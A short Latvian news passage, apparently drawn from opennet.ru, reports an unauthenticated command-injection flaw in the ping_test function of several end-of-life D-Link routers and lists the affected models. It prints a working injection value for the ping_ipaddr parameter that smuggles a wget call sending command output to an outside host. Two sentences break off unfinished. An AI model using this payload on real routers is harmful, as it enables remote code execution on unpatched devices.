D-Link bezvadu maršrutētājos
Interesanti, ka, pēc programmaparatūras izstrādātāju domām, “ping_test” izsaukums ir jāizpilda tikai pēc autentifikācijas, taču patiesībā tas tiek izsaukts jebkurā gadījumā, neatkarīgi no pieteikšanās tīmekļa saskarnē. Jo īpaši, piekļūstot skriptam apply_sec.cgi un nododot parametru “action=ping_test”, skripts novirza uz autentifikācijas lapu, bet tajā pašā laikā veic darbību, kas saistīta ar ping_test. Lai izpildītu kodu, pašā ping_test tika izmantota cita ievainojamība, kas izsauc ping utilītu, pienācīgi nepārbaudot testēšanai nosūtītās IP adreses pareizību. Piemēram, lai izsauktu utilītu wget un komandas “echo 1234” rezultātus pārsūtītu uz ārēju resursdatoru, vienkārši norādiet parametru “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Ievainojamības esamība ir oficiāli apstiprināta šādos modeļos:
- DIR-655 ar programmaparatūru 3.02b05 vai vecāku;
- DIR-866L ar programmaparatūru 1.03b04 vai vecāku;
- DIR-1565 ar programmaparatūru 1.01 vai vecāku;
- DIR-652 (informācija par problemātiskām programmaparatūras versijām netiek sniegta)
Atbalsta periods šiem modeļiem jau ir beidzies, tāpēc D-Link
Vēlāk tika atklāts, ka arī ievainojamība bija
Avots: opennet.ru